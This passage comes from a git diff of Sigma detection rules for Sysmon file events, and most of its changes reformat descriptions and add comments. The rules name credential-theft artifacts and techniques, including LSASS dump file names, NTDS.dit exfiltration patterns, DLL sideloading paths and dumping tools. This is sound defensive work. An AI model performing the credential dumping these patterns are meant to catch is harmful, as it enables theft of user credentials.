https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ author: Subhash Popuri (@pbssubhash) @@ -36,6 +30,6 @@ detection: TargetFilename|endswith: .bat condition: file_event and selection falsepositives: - - Any powershell script that creates bat files + - Any powershell script that creates bat files # highly unlikely (untested) level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml index 5a6b3116e..ff5206ede 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml @@ -1,8 +1,7 @@ title: Potential Remote Credential Dumping Activity id: 6e2a900a-ced9-4e4a-a9c2-13e706f9518a status: test -description: Detects default filenames output from the execution of CrackMapExec and - Impacket-secretsdump against an endpoint. +description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. references: - https://github.com/Porchetta-Industries/CrackMapExec - https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py @@ -22,6 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \svchost.exe + # CommandLine|contains: 'RemoteRegistry' # Uncomment this line if you collect CommandLine data for files events from more accuracy TargetFilename|re: \\Windows\\System32\\[a-zA-Z0-9]{8}\.tmp$ condition: file_event and selection falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml b/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml index 19f1c6d50..1ef6e4b93 100644 --- a/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml +++ b/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml @@ -1,9 +1,7 @@ title: Potential Initial Access via DLL Search Order Hijacking id: dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c status: test -description: Detects attempts to create a DLL file to a known desktop application - dependencies folder such as Slack, Teams or OneDrive and by an unusual process. - This may indicate an attempt to load a malicious module via DLL search order hijacking. +description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc - https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0 @@ -26,6 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: + # add more processes when you find them - \winword.exe - \excel.exe - \powerpnt.exe @@ -45,6 +44,7 @@ detection: - \Users\ - \AppData\ TargetFilename|contains: + # add more suspicious paths when you find them - \Microsoft\OneDrive\ - \Microsoft OneDrive\ - \Microsoft\Teams\ diff --git a/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml b/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml index c1b79aaa2..04ba32f61 100644 --- a/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml +++ b/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml @@ -1,9 +1,9 @@ title: Malicious DLL File Dropped in the Teams or OneDrive Folder id: 1908fcc1-1b92-4272-8214-0fbaf2fa5163 status: test -description: "Detects creation of a malicious DLL file in the location where the OneDrive\ - \ or Team applications\nUpon execution of the Teams or OneDrive application, the\ - \ dropped malicious DLL file (\u201Ciphlpapi.dll\u201D) is sideloaded\n" +description: | + Detects creation of a malicious DLL file in the location where the OneDrive or Team applications + Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml b/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml index 95717f6cc..5ff986bad 100644 --- a/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml +++ b/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml @@ -1,8 +1,7 @@ title: ISO File Created Within Temp Folders id: 2f9356ae-bf43-41b8-b858-4496d83b2acb status: test -description: Detects the creation of a ISO file in the Outlook temp folder or in the - Appdata temp folder. Typical of Qakbot TTP from end-July 2022. +description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. references: - https://twitter.com/Sam0x90/status/1552011547974696960 - https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html diff --git a/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml b/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml index 024566e8a..e50c524c0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml +++ b/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml @@ -1,13 +1,9 @@ title: ISO or Image Mount Indicator in Recent Files id: 4358e5a5-7542-4dcb-b9f3-87667371839b status: test -description: 'Detects the creation of recent element file that points to an .ISO, - .IMG, .VHD or .VHDX file as often used in phishing attacks. - - This can be a false positive on server systems but on workstations users should - rarely mount .iso or .img files. - - ' +description: | + Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. + This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. references: - https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore diff --git a/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml b/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml index 86062d42a..8c85b9788 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml @@ -1,13 +1,12 @@ title: GatherNetworkInfo.VBS Reconnaissance Script Output id: f92a6f1e-a512-4a15-9735-da09e78d7273 related: - - id: 575dce0c-8139-4e30-9295-1ee75969f7fe - type: similar - - id: 07aa184a-870d-413d-893a-157f317f6f58 - type: similar + - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN + type: similar + - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp + type: similar status: test -description: Detects creation of files which are the results of executing the built-in - reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". +description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government diff --git a/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml b/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml index ca023c1be..ed4332742 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml @@ -1,14 +1,12 @@ title: LSASS Process Memory Dump Files id: a5a2d357-1ab8-4675-a967-ef9990a59391 related: - - id: db2110f3-479d-42a6-94fb-d35bc1e46492 - type: obsoletes - - id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a - type: obsoletes + - id: db2110f3-479d-42a6-94fb-d35bc1e46492 + type: obsoletes + - id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a + type: obsoletes status: experimental -description: Detects creation of files with names used by different memory dumping - tools to create a memory dump of the LSASS process memory, which contains user - credentials. +description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. references: - https://www.google.com/search?q=procdump+lsass - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf @@ -37,11 +35,11 @@ detection: - \lsass.rar - \Andrew.dmp - \Coredump.dmp - - \NotLSASS.zip - - \PPLBlade.dmp + - \NotLSASS.zip # https://github.com/CCob/MirrorDump + - \PPLBlade.dmp # https://github.com/tastypepperoni/PPLBlade selection_2: TargetFilename|contains: - - \lsass_2 + - \lsass_2 # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp - \lsassdump - \lsassdmp selection_3: diff --git a/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml b/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml index 63cf34c49..14d39d4f6 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml @@ -1,9 +1,7 @@ title: LSASS Process Dump Artefact In CrashDumps Folder id: 6902955a-01b7-432c-b32a-6f5f81d8f625 status: test -description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. - This could be a sign of LSASS credential dumping. Techniques such as the LSASS - Shtinkering have been seen abusing the Windows Error Reporting to dump said process. +description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf @@ -26,7 +24,6 @@ detection: TargetFilename|endswith: .dmp condition: file_event and selection falsepositives: - - Rare legitimate dump of the process by the operating system due to a crash of - lsass + - Rare legitimate dump of the process by the operating system due to a crash of lsass level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml b/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml index 9974180a7..e698267cc 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml @@ -1,8 +1,7 @@ title: WerFault LSASS Process Memory Dump id: c3e76af5-4ce0-4a14-9c9a-25ceb8fda182 status: test -description: Detects WerFault creating a dump file with a name that indicates that - the dump file could be an LSASS process memory, which contains user credentials +description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials references: - https://github.com/helpsystems/nanodump author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml b/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml index 97a91ea6e..0b5493b85 100644 --- a/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml +++ b/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml @@ -1,8 +1,8 @@ title: Adwind RAT / JRAT File Artifact id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 related: - - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 - type: derived + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived status: test description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: @@ -24,12 +24,12 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|contains|all: - - \AppData\Roaming\Oracle\bin\java - - .exe - - TargetFilename|contains|all: - - \Retrive - - .vbs + - TargetFilename|contains|all: + - \AppData\Roaming\Oracle\bin\java + - .exe + - TargetFilename|contains|all: + - \Retrive + - .vbs condition: file_event and selection level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml b/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml index 2ca82af8c..35924415a 100644 --- a/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml +++ b/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml @@ -1,8 +1,7 @@ title: File Creation In Suspicious Directory By Msdt.EXE id: 318557a5-150c-4c8d-b70e-a9910e199857 status: test -description: Detects msdt.exe creating files in suspicious directories which could - be a sign of exploitation of either Follina or Dogwalk vulnerabilities +description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities references: - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ diff --git a/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml index 5080ec0cc..4e85ade73 100644 --- a/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml @@ -1,14 +1,12 @@ title: Suspicious DotNET CLR Usage Log Artifact id: e0b06658-7d1d-4cd3-bf15-03467507ff7c related: - - id: 4508a70e-97ef-4300-b62b-ff27992990ea - type: derived - - id: e4b63079-6198-405c-abd7-3fe8b0ce3263 - type: obsoletes + - id: 4508a70e-97ef-4300-b62b-ff27992990ea + type: derived + - id: e4b63079-6198-405c-abd7-3fe8b0ce3263 + type: obsoletes status: test -description: Detects the creation of Usage Log files by the CLR (clr.dll). These files - are named after the executing process once the assembly is finished executing - for the first time in the (user) session context. +description: Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context. references: - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ - https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml @@ -41,15 +39,15 @@ detection: - \UsageLogs\wscript.exe.log - \UsageLogs\wmic.exe.log filter_main_rundll32: + # This filter requires the event to be enriched by additional information such as ParentImage and CommandLine activity ParentImage|endswith: \MsiExec.exe ParentCommandLine|contains: ' -Embedding' Image|endswith: \rundll32.exe - CommandLine|contains|all: + CommandLine|contains|all: - Temp - zzzzInvokeManagedCustomActionOutOfProc condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and - msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675 + - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675 level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml b/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml index 428afe572..705bc2296 100644 --- a/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml +++ b/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml @@ -1,10 +1,7 @@ title: Suspicious File Creation In Uncommon AppData Folder id: d7b50671-d1ad-4871-aa60-5aa5b331fe04 status: test -description: Detects the creation of suspicious files and folders inside the user's - AppData folder but not inside any of the common and well known directories (Local, - Romaing, LocalLow). This method could be used as a method to bypass detection - who exclude the AppData folder in fear of FPs +description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -25,6 +22,7 @@ detection: TargetFilename|startswith: C:\Users\ TargetFilename|contains: \AppData\ TargetFilename|endswith: + # Add more as needed - .bat - .cmd - .cpl diff --git a/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml b/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml index 245b8a679..5fc3bb533 100644 --- a/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml @@ -1,9 +1,7 @@ title: SCR File Write Event id: c048f047-7e2a-4888-b302-55f509d4a91d status: experimental -description: Detects the creation of screensaver files (.scr) outside of system folders. - Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" - for example. +description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. references: - https://lolbas-project.github.io/lolbas/Libraries/Desk/ author: Christopher Peacock @securepeacock, SCYTHE @scythe_io @@ -28,7 +26,7 @@ detection: - :\Windows\System32\ - :\Windows\SysWOW64\ - :\Windows\WinSxS\ - - :\WUDownloadCache\ + - :\WUDownloadCache\ # Windows Update Download Cache condition: file_event and (selection and not filter) falsepositives: - The installation of new screen savers by third party software diff --git a/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml index c0071e31d..a0f4fbbd0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via Notepad++ Plugins id: 54127bd4-f541-4ac3-afdb-ea073f63f692 status: test -description: Detects creation of new ".dll" files inside the plugins directory of - a notepad++ installation by a process other than "gup.exe". Which could indicates - possible persistence +description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ author: Nasreddine Bencherchali (Nextron Systems) @@ -25,6 +23,7 @@ detection: filter_gup: Image|endswith: \Notepad++\updater\gup.exe filter_install: + # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: C:\Users\ Image|contains: \AppData\Local\Temp\ Image|endswith: diff --git a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml index ad4a67c45..829031fe8 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml @@ -1,11 +1,10 @@ title: NTDS.DIT Creation By Uncommon Parent Process id: 4e7050dd-e548-483f-b7d6-527ab4fa784d related: - - id: 11b1ed55-154d-4e82-8ad7-83739298f720 - type: similar + - id: 11b1ed55-154d-4e82-8ad7-83739298f720 + type: similar status: test -description: Detects creation of a file named "ntds.dit" (Active Directory Database) - by an uncommon parent process or directory +description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory references: - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ @@ -21,9 +20,7 @@ tags: logsource: product: windows category: file_event - definition: 'Requirements: The "ParentImage" field is not available by default - on EID 11 of Sysmon logs. To be able to use this rule to the full extent you - need to enrich the log with additional ParentImage data' + definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enrich the log with additional ParentImage data' detection: file_event: EventID: 11 @@ -31,6 +28,7 @@ detection: selection_file: TargetFilename|endswith: \ntds.dit selection_process_parent: + # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11 ParentImage|endswith: - \cscript.exe - \httpd.exe @@ -41,6 +39,7 @@ detection: - \w3wp.exe - \wscript.exe selection_process_parent_path: + # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11 ParentImage|contains: - \apache - \tomcat diff --git a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml index a17e32ccc..2fbb5e4bd 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml @@ -1,11 +1,10 @@ title: NTDS.DIT Creation By Uncommon Process id: 11b1ed55-154d-4e82-8ad7-83739298f720 related: - - id: 4e7050dd-e548-483f-b7d6-527ab4fa784d - type: similar + - id: 4e7050dd-e548-483f-b7d6-527ab4fa784d + type: similar status: test -description: Detects creation of a file named "ntds.dit" (Active Directory Database) - by an uncommon process or a process located in a suspicious directory +description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory references: - https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/ - https://adsecurity.org/?p=2398 @@ -28,6 +27,7 @@ detection: TargetFilename|endswith: \ntds.dit selection_process_img: Image|endswith: + # Add more suspicious processes as you see fit - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml b/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml index a3e760b97..396f4434d 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml @@ -1,8 +1,7 @@ title: NTDS Exfiltration Filename Patterns id: 3a8da4e0-36c1-40d2-8b29-b3e890d5172a status: test -description: Detects creation of files with specific name patterns seen used in various - tools that export the NTDS.DIT for exfiltration. +description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. references: - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1 @@ -23,8 +22,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|endswith: - - \All.cab - - .ntds.cleartext + - \All.cab # https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1 + - .ntds.cleartext # https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405 condition: file_event and selection falsepositives: - Unknown diff --git a/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml index e4a81b32d..6e362525e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Microsoft Office Add-In id: 8e1cb247-6cf6-42fa-b440-3f27d57e9936 status: test -description: Detects potential persistence activity via startup add-ins that load - when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). +description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). references: - Internal Research - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence diff --git a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml index d529a72f7..e2a318277 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml @@ -1,8 +1,8 @@ title: Office Macro File Creation id: 91174a41-dc8f-401b-be89-7bfc140612a0 related: - - id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 - type: similar + - id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 + type: similar status: test description: Detects the creation of a new office macro files on the systems references: diff --git a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml index 54b196354..bf6940106 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml @@ -1,11 +1,10 @@ title: Office Macro File Download id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 related: - - id: 91174a41-dc8f-401b-be89-7bfc140612a0 - type: similar + - id: 91174a41-dc8f-401b-be89-7bfc140612a0 + type: similar status: experimental -description: Detects the creation of a new office macro files on the systems via an - application (browser, mail client). +description: Detects the creation of a new office macro files on the systems via an application (browser, mail client). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md - https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference @@ -25,9 +24,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_processes: Image|endswith: - - \RuntimeBroker.exe + # Email clients + - \RuntimeBroker.exe # Windows Email clients uses RuntimeBroker to create the files - \outlook.exe - \thunderbird.exe + # Browsers - \brave.exe - \chrome.exe - \firefox.exe @@ -42,20 +43,20 @@ detection: - \vivaldi.exe - \whale.exe selection_ext: - - TargetFilename|endswith: - - .docm - - .dotm - - .xlsm - - .xltm - - .potm - - .pptm - - TargetFilename|contains: - - .docm:Zone - - .dotm:Zone - - .xlsm:Zone - - .xltm:Zone - - .potm:Zone - - .pptm:Zone + - TargetFilename|endswith: + - .docm + - .dotm + - .xlsm + - .xltm + - .potm + - .pptm + - TargetFilename|contains: + - .docm:Zone + - .dotm:Zone + - .xlsm:Zone + - .xltm:Zone + - .potm:Zone + - .pptm:Zone condition: file_event and (all of selection_*) falsepositives: - Legitimate macro files downloaded from the internet diff --git a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml index 8d342c450..d3e84e1c0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml @@ -15,26 +15,25 @@ tags: logsource: category: file_event product: windows - definition: 'Requirements: The "ParentImage" field is not available by default - on EID 11 of Sysmon logs. To be able to use this rule to the full extent you - need to enriche the log with additional ParentImage data' + definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enriche the log with additional ParentImage data' detection: file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - Image|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentImage|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe + - Image|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11 + - ParentImage|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe selection_ext: TargetFilename|endswith: - .docm diff --git a/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml b/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml index 43ec4cbb7..95ecdbe27 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml @@ -1,8 +1,7 @@ title: OneNote Attachment File Dropped In Suspicious Location id: 7fd164ba-126a-4d9c-9392-0d4f7c243df0 status: experimental -description: Detects creation of files with the ".one"/".onepkg" extension in suspicious - or uncommon locations. This could be a sign of attackers abusing OneNote attachments +description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments references: - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/ - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ @@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|contains: + # Note: add more common locations for drops such as download folders and the like. Or baseline legitimate locations and alert on everything else - \AppData\Local\Temp\ - \Users\Public\ - \Windows\Temp\ diff --git a/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml b/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml index 0fe7f5796..738f027d8 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml @@ -1,9 +1,7 @@ title: Suspicious File Created Via OneNote Application id: fcc6d700-68d9-4241-9a1a-06874d621b06 status: test -description: Detects suspicious files created via the OneNote application. This could - indicate a potential malicious ".one"/".onepkg" file was executed as seen being - used in malware activity in the wild +description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild references: - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/ - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ @@ -31,6 +29,7 @@ detection: - \onenoteim.exe TargetFilename|contains: \AppData\Local\Temp\OneNote\ TargetFilename|endswith: + # TODO: Add more suspicious extensions - .bat - .chm - .cmd @@ -47,9 +46,7 @@ detection: - .wsf condition: file_event and selection falsepositives: - - False positives should be very low with the extensions list cited. Especially - if you don't heavily utilize OneNote. - - Occasional FPs might occur if OneNote is used internally to share different - embedded documents + - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote. + - Occasional FPs might occur if OneNote is used internally to share different embedded documents level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml b/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml index f5efaed6c..152036c4b 100644 --- 